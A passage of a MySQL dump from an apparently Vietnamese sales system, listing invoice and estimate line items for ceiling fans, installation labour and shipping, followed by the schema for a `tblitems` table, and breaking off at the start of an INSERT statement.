(1202, 246, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 2m5 \r\nMàu Black - sơn 2 thành phần', 'Đường kính cánh: 8ft ft (2.4 m) <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed) <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz <br />\r\nĐiều khiển / Control: Remote Control for Wall <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA <br />\r\nTrọng lượng: 18 kg <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2 <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h) <br />\r\n <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh) <br />\r\nĐẶT ĐIỂM CHUNG - QUẠT TRẦN POWERFUL S1 <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum <br />\r\nPhụ kiện an toàn kèm theo, bộ phụ kiện lắp cánh quạt đã bao gồm <br />\r\nTuỳ chọn: điều khiển Modbus quản lý tập trung BMS. Liên hệ nhà cung cấp tư vấn <br />\r\nThương hiệu: SUNON/ Taiwan (thiết kế sản xuất 100% Taiwan)', 1.00, 34800000.00, '', 1, 28, NULL, 0.00),
(1203, 246, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Thi công lắp đặt quạt trần <br />\r\nGia cố móc<br />\r\n(chưa bao gồm chi phí thi công nguồn điện)', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(1204, 375, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 4000000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1944/thumb_abacus-white_crm_img.jpg', 0.00),
(1208, 376, 'invoice', 'Haiku 60 inch Caramel Bamboo, Low Profile Black', 'Sải cánh 150cm (60 inch)        <br />\r\nMàu cánh: Caramel Bamboo         <br />\r\nMàu thân : Universal Black        <br />\r\nĐộng cơ EC, công suất 29.3W        <br />\r\nĐiều khiển từ xa 7 tốc độ đi kèm        <br />\r\nTích hợp sẳn bộ cảm biến SenseME (điều khiển APP, cảm biến chuyển động...)        <br />\r\nBộ đèn LED tuỳ chọn thêm        <br />\r\nThương hiệu: Haiku/USA', 1.00, 47200000.00, 'cái', 1, 20, 'https://hgphome.com/uploads/items/1840/thumb_caramel_low.jpg', 0.00),
(1210, 377, 'invoice', 'Haiku L 52 inch White', 'Sải cánh 132cm (52inch)     <br />\r\nĐộng cơ EC, công suất 20.9W     <br />\r\nMàu thân/cánh: Trắng   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm  <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP)  <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 21500000.00, '', 1, 20, 'https://hgphome.com/uploads/items/1850/thumb_thumb_haiku52-2-wh.jpg', 0.00),
(1211, 378, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 6800000.00, 'cái', 1, 30, 'https://hgphome.com/uploads/items/1944/thumb_abacus-white_crm_img.jpg', 0.00),
(1212, 378, 'invoice', 'Chi phí vận chuyển', '', 1.00, 225000.00, 'lô', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1213, 379, 'invoice', 'Quạt trần cao cấp LINES 60 Black', 'Đường kính cánh: 152cm  (60inch) <br />\r\nĐộng cơ: BLDC motor, công suất 38W  <br />\r\nBộ điều khiển từ xa <br />\r\nMàu sắc cánh: Maple Wood <br />\r\nMàu sắc thân quạt: Black', 4.00, 5500000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 4.00),
(1214, 380, 'invoice', 'Bộ điều khiển DC 6 tốc độ', '', 1.00, 750000.00, '', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1215, 380, 'invoice', 'Đèn LED quạt trần Tobago', '', 1.00, 500000.00, '', 2, 0, 'https://hgphome.com/uploads/items/1938/thumb_den-led.jpg', 0.00),
(1216, 380, 'invoice', 'Chi phí bảo dưỡng, sửa chữa quạt trần', 'Chi phí bảo dưỡng, sửa chữa quạt trần', 1.00, 350000.00, 'cái', 3, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1217, 381, 'invoice', 'Haiku L 44 inch Black', 'Sải cánh 112cm (44 inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 19700000.00, '', 1, 0, 'https://hgphome.com/uploads/items/1852/thumb_thumb_haiku44-bl.jpg', 0.00),
(1218, 382, 'invoice', 'Quạt trần 3 cánh gỗ AKMANI 52 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu Cánh Quạt: Dark Walnut Wood (màu vân gỗ tự nhiên) <br />\r\nMàu thân Quạt: Matte Black (sơn tĩnh điện màu Đen) <br />\r\nSải Cánh Quạt: 1m32 ~ 52 inchs <br />\r\nĐiều Khiển: Từ xa 5 cấp độ - đi kèm <br />\r\nAirflow (M3/Min): 6823 CFM <br />\r\nTốc Độ Quay: 5-6 cấp độ gió <br />\r\nNhà Sản Xuất/Xuất Xứ:  Tổ chức đào tạo WIT/ China <br />\r\nTiêu Chuẩn Động Cơ: động cơ DC tiêu chuẩn BLDC (tiết kiệm 70% điện năng)', 25.00, 5800000.00, '', 1, 38, 'https://hgphome.com/uploads/items/1867/thumb_akmani_darkwalnut.jpg', 0.00),
(1219, 382, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình', 1.00, 1000000.00, 'lô', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1220, 383, 'invoice', 'Bảo dưỡng, sửa chữa quạt', '', 1.00, 350000.00, 'cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1221, 384, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...     <br />\r\nCông việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 4.00, 300000.00, 'cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1222, 384, 'invoice', 'Bộ điều khiển DC 6 tốc độ Tổ chức đào tạo WIT', 'Điều khiển quạt trần 7062A/70763/811', 1.00, 700000.00, '', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1223, 385, 'invoice', 'Quạt trần 5 cánh gỗ ABACUS 60 Matt Black Wood', 'Sải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 4.00, 4550000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1944/thumb_abacus-white_crm_img.jpg', 0.00),
(1224, 386, 'invoice', 'Quạt trần SINO 52 White Wood', 'Sải cánh 132cm ( ~ 52inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W   <br />\r\nMàu thân quạt: Brushed Nickel (Mạ chrome màu INox)   <br />\r\nMàu cánh: Gỗ sồi sáng (Maple Wood)    Điều khiển từ xa 5 tốc độ đi kèm', 3.00, 4095000.00, 'cái', 1, 35, 'https://hgphome.com/uploads/items/1855/thumb_sino-52-white.jpg', 0.00),
(1225, 386, 'invoice', 'Quạt trần 3 cánh gỗ RUCKUS 60', 'Đường kính cánh152 cm màu sắc tùy chọn Timber Wood. <br />\r\nĐộng cơ vẫn thiết kế tiêu chuẩn Ultra-BLDC với hiệu suất cao công suất chỉ 38 W <br />\r\nNhập khẩu phân phối - bảo hành chính hãng 05 năm động cơ. <br />\r\nThương hiệu Tổ chức đào tạo WIT, sản xuất tại Trung Quốc', 2.00, 5395000.00, '', 2, 35, 'https://hgphome.com/uploads/items/1968/thumb_ruckus-60.jpg', 0.00),
(1226, 386, 'invoice', 'Nhân công lắp đặt quạt trần', '', 5.00, 400000.00, 'cái', 3, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1227, 387, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu thân quạt: Màu Đen <br />\r\nMàu cánh: Dark Walnut <br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT', 3.00, 3900000.00, '', 1, 40, 'https://hgphome.com/uploads/items/1883/thumb_onix-54.jpg', 0.00),
(1229, 387, 'invoice', 'Nhân công lắp đặt quạt trần', 'Lắp đặt miễn phí', 3.00, 0.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1924/thumb_thumb_lap_dat-1.jpg', 0.00),
(1230, 388, 'invoice', 'Haiku L 52 inch White - Caramel', 'Sải cánh 132cm (52inch)       <br />\r\nĐộng cơ EC, công suất 20.9W       <br />\r\nMàu thân/cánh: Trắng     <br />\r\nMàu cánh: Caramel   <br />\r\nĐiều khiển từ xa 7 cấp đi kèm    <br />\r\nTuỳ chọn thêm: Đèn LED 2700K dimmble qua điều khiển và APP; Module 0-10V; Module WiFi (điều khiển qua APP)    <br />\r\nThương hiệu: Haiku/USA (lắp ráp tại Malaysia)', 1.00, 23800000.00, 'bộ', 1, 25, 'https://hgphome.com/uploads/items/1948/thumb_haiku_L_caramel_52.jpg', 0.00),
(1231, 388, 'invoice', 'Bộ đèn LED Haiku L series', 'Đèn LED Haiku L Series<br />\r\nÁnh sáng : 2700K<br />\r\nĐiều chỉnh: Dimmable 16 cấp<br />\r\nKiểu lắp: chế độ gài rất dễ tháo ráp', 1.00, 4500000.00, 'cái', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1232, 389, 'invoice', 'Quạt trần cao cấp IRIS 60 White ABS', 'Quạt trần HVLS Modern IRIS 60   <br />\r\nSải cánh: 152cm   <br />\r\nĐộng cơ EC, công suất 55 W (max speed)   <br />\r\nĐiều khiển 6 tốc độ đi kèm   <br />\r\nThương hiệu: SUNON/Taiwan', 34.00, 10000000.00, 'cái', 1, 0, 'https://hgphome.com/uploads/items/1858/thumb_sunon-white-modern.jpg', 0.00),
(1233, 389, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Gia cố móc trần bê tông <br />\r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) <br />\r\n- Gia cố dây cáp inox an toàn <br />\r\n- Đấu điện cấp nguồn cho quạt <br />\r\n- Cân bằng hoạt động cánh quạt', 34.00, 300000.00, 'cái', 2, 0, 'https://hgphome.com/uploads/items/1925/thumb_thumb_lap_dat-1.jpg', 0.00),
(1235, 390, 'invoice', 'Bảo dưỡng, sửa chữa quạt PS1', '', 1.00, 500000.00, 'cái', 1, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1236, 390, 'invoice', 'Phí gia cố phần mái treo quạt', '', 1.00, 500000.00, '', 2, 0, 'https://hgphome.com/assets/images/item-placeholder.jpg', 0.00),
(1237, 391, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 132cm <br />\r\nMàu thân quạt: Màu Đen <br />\r\nMàu cánh: Dark Walnut <br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT', 3.00, 6500000.00, '', 1, 10, NULL, 0.00),
(1238, 391, 'invoice', 'Nhân công lắp đặt quạt trần', 'Lắp đặt miễn phí', 2.00, 200000.00, 'cái', 2, 20, NULL, 0.00),
(1239, 248, 'estimate', 'Quạt trần cao cấp LINES 60 Black', 'Đường kính cánh: 152cm  (60inch)  <br />\r\nĐộng cơ: BLDC motor, công suất 38W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: Black', 6.00, 5800000.00, '', 1, 0, NULL, 0.00),
(1240, 249, 'estimate', 'Bộ điều khiển DC 5 tốc độ Tổ chức đào tạo WIT', 'Điều khiển thay thế quạt SINO 52 ', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(1241, 392, 'invoice', 'Bộ điều khiển DC 6 tốc độ Mountair Air', '', 1.00, 750000.00, '', 1, 0, NULL, 0.00),
(1242, 393, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Dark Walnut', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color : Dark Walnut (Màu gỗ tối - chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm ', 2.00, 5500000.00, '', 1, 0, NULL, 0.00),
(1243, 393, 'invoice', 'Nhân công lắp đặt quạt trần', '', 2.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(1244, 394, 'invoice', 'Quạt trần KATRINA LED Gray Dark Wood', 'Sải cánh 132cm ( ~ 52inch)     <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 35W     <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)     <br />\r\nMàu thân quạt: Gray Matt (xám tro - tương đồng với màu tường xi măng)     <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)     <br />\r\nĐèn LED: 3 màu, 2700K - 3000K     <br />\r\nĐiều khiển từ xa 5 tốc độ đi kèm     <br />\r\nThương hiệu: Tổ chức đào tạo WIT - sản xuất China', 1.00, 3900000.00, 'Cái', 1, 0, NULL, 0.00),
(1245, 394, 'invoice', 'Chi phí vận chuyển', '', 1.00, 300000.00, 'cái', 2, 0, NULL, 0.00),
(1246, 394, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 3, 0, NULL, 0.00),
(1247, 250, 'estimate', 'Quạt trần 5 cánh gỗ tự nhiên', 'Model: NW 1046<br />\r\nSải cánh 152cm ( ~ 60inch)   <br />\r\nĐộng cơ DC, công nghệ từ nam châm BLDC, công suất ~ 40W   <br />\r\nĐiều khiển từ xa 5 cấp độ đi kèm (tuỳ chọn điều khiển gắn tường Bluetooth)   <br />\r\nMàu thân quạt: Matt Black (Trắng mờ sơn tĩnh điện)   <br />\r\nMàu cánh: Gỗ sáng (Maple Wood)   <br />\r\nTuỳ chọn đèn: N/A (không có)', 1.00, 4550000.00, 'cái', 1, 0, NULL, 0.00),
(1248, 395, 'invoice', 'remote quạt sino', '', 1.00, 250000.00, 'cái', 1, 0, NULL, 0.00),
(1249, 251, 'estimate', 'Chi phí sơn 5 cánh quạt màu Dark Walnut', '', 8.00, 800000.00, 'bộ', 1, 0, NULL, 0.00),
(1250, 252, 'estimate', 'Quạt trần 3 cánh gỗ PEARL 60 Màu Light Chery', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color: Light Chery (chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6020000.00, '', 1, 0, NULL, 0.00),
(1251, 252, 'estimate', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(1252, 396, 'invoice', 'Quạt trần 3 cánh gỗ PEARL 60 Màu Light Chery', 'Model: NW 1902<br />\r\nMotor Spec: BLDC Motor (Gearless Drive Technology), động cơ Gearless, 200-240 VAC; 50/60Hz, 10A, 1 phase. <br />\r\nBlades (Số cánh): 3 pcs <br />\r\nBlades Color: Light Chery (chất liệu gỗ tự nhiên nguyên khối) <br />\r\nDiameter (Sải cánh):  1.5 mét (60 inch)  <br />\r\nWeight * (Trọng lượng): 6.3 kg <br />\r\nSpeed (tốc độ quay): 197 RPM (speed at max) <br />\r\nWatts (công suất):  38 W (max) <br />\r\nNoise (độ ồn tốc độ cao):  &lt;35 dB(A) <br />\r\nPower input (nguồn điện): 220-240 VAC <br />\r\nEnvironment (môi trường sử dụng): trong nhà (indoor) <br />\r\nWarranty (Bảo hành): 05 năm <br />\r\nThương hiệu: Tổ chức đào tạo WIT - Made in China <br />\r\nBộ điều khiển từ xa RF đi kèm', 1.00, 6020000.00, '', 1, 0, NULL, 0.00),
(1253, 396, 'invoice', 'Nhân công lắp đặt quạt trần', '', 1.00, 500000.00, 'cái', 2, 0, NULL, 0.00),
(1254, 253, 'estimate', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Đen<br />\r\nMàu cánh: Cánh gián<br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT/China', 1.00, 4875000.00, '', 1, 0, NULL, 0.00),
(1255, 397, 'invoice', 'Quạt trần cánh gỗ ONIX 56 Dark Wood', 'Sải cánh 142cm <br />\r\nMàu thân quạt: Màu Đen<br />\r\nMàu cánh: Cánh gián<br />\r\nĐộng cơ DC, công suất 35W <br />\r\nĐiều khiển từ xa 5 cấp độ <br />\r\nThương hiệu: Tổ chức đào tạo WIT/China', 1.00, 4875000.00, '', 1, 0, NULL, 0.00),
(1256, 254, 'estimate', 'Quạt trần cánh lớn Powerful S1 sải cánh 3m', 'Đường kính cánh: 10ft ft (3.0 m)   <br />\r\nCánh quạt / Airfoils : 7 cánh. Chất liệu cánh: Aluminum   <br />\r\nTốc độ quay tối đa / Max Speed: 95 RPM (max speed)   <br />\r\nNguồn điện / Input Power: 220-240 VAC, 1Φ, 50/60 Hz   <br />\r\nĐiều khiển / Control: Remote Control for Wall   <br />\r\nĐộ ồn / Sound at Max Speed: &lt;35 dBA   <br />\r\nTrọng lượng: 18 kg   <br />\r\nDiện tích bao phủ mát / Max Affected Area: 1,722 ft2 / 160 m2   <br />\r\nLưu lượng luồng gió: 24,500 CFM (41,596 m3/h)   <br />\r\nCông suất động cơ / Power Consumption: 84 W (tiết kiệm điện 90% so với động cơ AC thường ở cùng sải cánh)', 3.00, 24600000.00, '', 1, 0, NULL, 0.00),
(1257, 254, 'estimate', 'Nhân công lắp đặt trần bê tông', 'Gia cố móc trần bê tông <br />\r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) <br />\r\n- Gia cố dây cáp inox an toàn <br />\r\n- Đấu điện cấp nguồn cho quạt <br />\r\n- Cân bằng hoạt động cánh quạt', 3.00, 800000.00, 'cái', 2, 0, NULL, 0.00),
(1258, 254, 'estimate', 'Phí quản lý thi công', 'Gia cố khung treo quạt trần<br />\r\nChi phí đi lại, thuê giàn giáo <br />\r\nMua vật tư sắt V hàn khung treo quạt', 1.00, 3500000.00, 'lô', 3, 0, NULL, 0.00),
(1259, 398, 'invoice', 'Quạt trần cao cấp Modern SUNON 60 White ABS', 'Quạt trần HVLS Modern IRIS 60     <br />\r\nSải cánh: 152cm     <br />\r\nĐộng cơ EC, công suất 55 W (max speed)     <br />\r\nĐiều khiển 6 tốc độ đi kèm     <br />\r\nThương hiệu: SUNON/Taiwan', 5.00, 10000000.00, 'cái', 1, 0, NULL, 0.00),
(1260, 398, 'invoice', 'Nhân công lắp đặt trần bê tông', 'Gia cố móc trần bê tông <br />\r\n- Khoan tắc kê đạn 8 li x 2 (cách nhau 11cm) <br />\r\n- Gia cố dây cáp inox an toàn <br />\r\n- Đấu điện cấp nguồn cho quạt <br />\r\n- Cân bằng hoạt động cánh quạt', 5.00, 300000.00, 'cái', 2, 0, NULL, 0.00),
(1261, 399, 'invoice', 'Quạt trần cao cấp LINES 60 Black', 'Đường kính cánh: 152cm  (60inch)  <br />\r\nĐộng cơ: BLDC motor, công suất 38W   <br />\r\nBộ điều khiển từ xa  <br />\r\nMàu sắc cánh: Maple Wood  <br />\r\nMàu sắc thân quạt: Black', 1.00, 6020000.00, '', 1, 0, NULL, 0.00),
(1262, 255, 'estimate', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S    <br />\r\nProduct Name: POWERFUL SERIES 10    <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor,  <br />\r\nSpeed (min/max): 10 / 50 RPM    <br />\r\nWeight: 120.86 kg    <br />\r\nMaximum Rated Current : 8.3 A    <br />\r\nPower consumption (max W): 1,050 W  <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz    <br />\r\nFan Weight (trọng lượng): 120.86 kg  <br />\r\nSound at max. Speed (độ ồn): ˜46 dB(A)    <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h)     <br />\r\nMax Affected Area: 2,612 m2    <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color   <br />\r\nColor: Airfoil:Silver , Winglet: Black      <br />\r\nMounting components: 1m Extension tube length  <br />\r\nController: Knob Wall Controller mounted    <br />\r\nFan Diameter: 24ft (7.3m)    <br />\r\nBảo hành (Warranty): 03 years    <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 2.00, 109000000.00, '', 1, 0, NULL, 0.00),
(1263, 255, 'estimate', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc quạt trần Công Nghiệp <br />\r\nCáp an toàn 4 sợi<br />\r\nỐng ty treo 1,2m<br />\r\n', 2.00, 5000000.00, 'cái', 2, 0, NULL, 0.00),
(1264, 255, 'estimate', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình', 1.00, 1800000.00, 'lô', 3, 0, NULL, 0.00),
(1265, 400, 'invoice', 'Quạt trần công nghiệp SUNON Powerful S10 sải cánh 7m3', 'Model Number:BCNF1CB288A-01S    <br />\r\nProduct Name: POWERFUL SERIES 10    <br />\r\nMotor and Gearles: Brushless EC motor, IP55 motor,  <br />\r\nSpeed (min/max): 10 / 50 RPM    <br />\r\nWeight: 120.86 kg    <br />\r\nMaximum Rated Current : 8.3 A    <br />\r\nPower consumption (max W): 1,050 W  <br />\r\nInput Condition: 220-240 VAC, 1Φ, 50-60Hz    <br />\r\nFan Weight (trọng lượng): 120.86 kg  <br />\r\nSound at max. Speed (độ ồn): ˜46 dB(A)    <br />\r\nMax Airflow: 338,127 CFM (574,069 m3/h)     <br />\r\nMax Affected Area: 2,612 m2    <br />\r\nAirfoil finish (số cánh): 07 blades with aluminimum color   <br />\r\nColor: Airfoil:Silver , Winglet: Black      <br />\r\nMounting components: 1m Extension tube length  <br />\r\nController: Knob Wall Controller mounted    <br />\r\nFan Diameter: 24ft (7.3m)    <br />\r\nBảo hành (Warranty): 03 years    <br />\r\nThương hiệu: SUNON/Taiwan - sản xuất 100% Đài Loan', 2.00, 109000000.00, '', 1, 0, NULL, 0.00),
(1266, 400, 'invoice', 'Nhân công lắp đặt quạt trần - Trần Thạch cao, La phông', 'Gia cố móc quạt trần Công Nghiệp <br />\r\nCáp an toàn 4 sợi<br />\r\nỐng ty treo 1,2m', 2.00, 5000000.00, 'cái', 2, 0, NULL, 0.00),
(1267, 400, 'invoice', 'Chi phí vận chuyển', 'Vận chuyển xe tải tới chân công trình', 1.00, 1800000.00, 'lô', 3, 0, NULL, 0.00),
(1269, 401, 'invoice', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Công việc:     <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(1270, 256, 'estimate', 'Bảo dưỡng, sửa chữa lắp đặt quạt', 'Chi phí bảo dưỡng, sửa chữa quạt trần, quạt cây, quạt đứng, quạt treo tường...                    <br />\r\nCông việc:                    <br />\r\nVệ sinh quạt, tra dầu mỡ, kiểm tra ốc ít, móc treo an toàn sử dụng - thời gian sử dụng chốt ty, ốc ty mòn...', 1.00, 350000.00, 'cái', 1, 0, NULL, 0.00),
(1271, 10, 'credit_note', 'Khóa học 01', '', 1.00, 0.00, 'cái', 1, 0, NULL, 0.00);

-- --------------------------------------------------------

--
-- Table structure for table `tblitems`
--

CREATE TABLE `tblitems` (
  `id` int(11) NOT NULL,
  `description` mediumtext NOT NULL,
  `long_description` text DEFAULT NULL,
  `rate` decimal(15,2) NOT NULL,
  `tax` int(11) DEFAULT NULL,
  `tax2` int(11) DEFAULT NULL,
  `unit` varchar(40) DEFAULT NULL,
  `group_id` int(11) NOT NULL DEFAULT 0,
  `item_image` varchar(255) DEFAULT NULL,
  `commodity_code` varchar(100) NOT NULL,
  `commodity_barcode` text DEFAULT NULL,
  `commodity_type` int(11) DEFAULT NULL,
  `warehouse_id` int(11) DEFAULT NULL,
  `origin` varchar(100) DEFAULT NULL,
  `color_id` int(11) DEFAULT NULL,
  `style_id` int(11) DEFAULT NULL,
  `model_id` int(11) DEFAULT NULL,
  `size_id` int(11) DEFAULT NULL,
  `unit_id` int(11) DEFAULT NULL,
  `sku_code` varchar(200) DEFAULT NULL,
  `sku_name` varchar(200) DEFAULT NULL,
  `purchase_price` decimal(15,2) DEFAULT NULL,
  `sub_group` varchar(200) DEFAULT NULL,
  `commodity_name` varchar(200) NOT NULL,
  `color` text DEFAULT NULL,
  `guarantee` text DEFAULT NULL,
  `profif_ratio` text DEFAULT NULL,
  `active` int(11) DEFAULT 1,
  `long_descriptions` longtext DEFAULT NULL,
  `without_checking_warehouse` int(11) DEFAULT 1,
  `series_id` text DEFAULT NULL,
  `parent_id` int(11) DEFAULT NULL,
  `attributes` longtext DEFAULT NULL,
  `parent_attributes` longtext DEFAULT NULL,
  `can_be_sold` varchar(100) DEFAULT 'can_be_sold',
  `can_be_purchased` varchar(100) DEFAULT 'can_be_purchased',
  `can_be_manufacturing` varchar(100) DEFAULT 'can_be_manufacturing',
  `can_be_inventory` varchar(100) DEFAULT 'can_be_inventory',
  `from_vendor_item` int(11) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblitems`
--

INSERT INTO `tblitems` (`id`, `description`, `long_description`, `rate`, `tax`, `tax2`, `unit`, `group_id`, `item_image`, `commodity_code`, `commodity_barcode`, `commodity_type`, `warehouse_id`, `origin`, `color_id`, `style_id`, `model_id`, `size_id`, `unit_id`, `sku_code`, `sku_name`, `purchase_price`, `sub_group`, `commodity_name`, `color`, `guarantee`, `profif_ratio`, `active`, `long_descriptions`, `without_checking_warehouse`, `series_id`, `parent_id`, `attributes`, `parent_attributes`, `can_be_sold`, `can_be_purchased`, `can_be_manufacturing`, `can_be_inventory`, `from_vendor_item`) VALUES
